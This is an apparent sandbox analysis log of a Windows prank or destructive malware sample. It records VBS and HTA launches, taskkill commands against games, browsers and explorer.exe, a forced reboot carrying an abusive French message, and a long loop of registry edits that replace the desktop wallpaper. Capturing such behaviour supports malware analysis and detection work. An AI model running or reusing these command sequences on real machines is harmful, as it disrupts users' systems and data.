C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6618.vbs"3⤵PID:2932
-
-
C:\Windows\system32\timeout.exetimeout 143⤵
- Delays execution with timeout.exe
PID:3688
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM hl2.exe3⤵
- Kills process with taskkill
PID:1392
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM javaw.exe3⤵
- Kills process with taskkill
PID:1272
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM RobloxPlayerBeta.exe3⤵
- Kills process with taskkill
PID:3700
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM FortniteClient-Win64-Shipping.exe3⤵
- Kills process with taskkill
PID:3848
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM GenshinImpact.exe3⤵
- Kills process with taskkill
PID:2316
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM Among Us.exe3⤵
- Kills process with taskkill
PID:3556
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
PID:1804
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe3⤵
- Kills process with taskkill
PID:2572
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe3⤵
- Kills process with taskkill
PID:2200
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iexplore.exe3⤵
- Kills process with taskkill
PID:2724
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM explorer.exe3⤵
- Kills process with taskkill
PID:4500
-
-
C:\Windows\system32\shutdown.exeshutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"3⤵PID:4984
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5601.vbs"3⤵
- Blocklisted process makes network request
- Enumerates connected drives
PID:5020
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16163.vbs"3⤵
- Enumerates connected drives
PID:4680
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2518.vbs"3⤵PID:2916
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- System Location Discovery: System Language Discovery
PID:3916
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15084.vbs" 8651.bat3⤵PID:3464
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8651.bat" "4⤵
- Modifies registry class
PID:3692 -
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:4660
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:2156
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:2228
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:484
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:2320
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:3688
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:1056
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:1272
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3576
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3156
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5104
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:1144
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:1580
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:2340
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4420
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:2876
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:744
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:2720
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3672
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3312
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4180
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3992
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3908
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:2460
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:4640
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:2696
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3580
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3608
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3624
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:3520
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3948
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4400
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4376
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3876
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3480
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:1492
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:1612
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4100
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3136
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3736
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1088
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:4676
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:776
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3180
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3024
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1496
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:576
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:4416
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:2036
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4736
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:1344
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3264
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:2832
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:4936
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3464
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3128
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:1792
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4516
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:2228
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:4428
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:4692
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:2320
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4652
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4332
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1272
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:3700
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3848
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3296
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:2316
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1580
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:2340
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:4420
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:1236
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:2384
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:2408
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4220
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3448
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:1640
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:2236
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3584
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3308
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3640
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4092
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:3268
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:4400
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4752
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3480
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1612
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4100
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:1764
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:2000
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4224
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:2204
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1996
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1088
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:776
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3232
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4548
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:576
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:2036
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:936
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:1344
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:4732
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:1056
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:1708
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:2340
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1236
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5236
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5252
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5372
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5552
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5588
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5604
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5624
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5636
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5656
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5676
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5688
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5700
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5728
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5740
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5764
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5784
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5796
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5812
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5836
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5852
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5872
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5896
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5908
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5920
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5936
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5952
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6128
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6140
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5140
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5168
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5280
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5264
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5348
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5300
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5344
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5392
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5516
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5564
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5552
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5592
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5588
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5604
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5636
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5692
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5708
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5760
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5776
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:6128
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5144
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:688
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5212
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5264
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5348
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5272
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5344
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5556
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5520
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5600
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5608
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5684
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5564
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5552
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5600
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5608
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5788
-
-
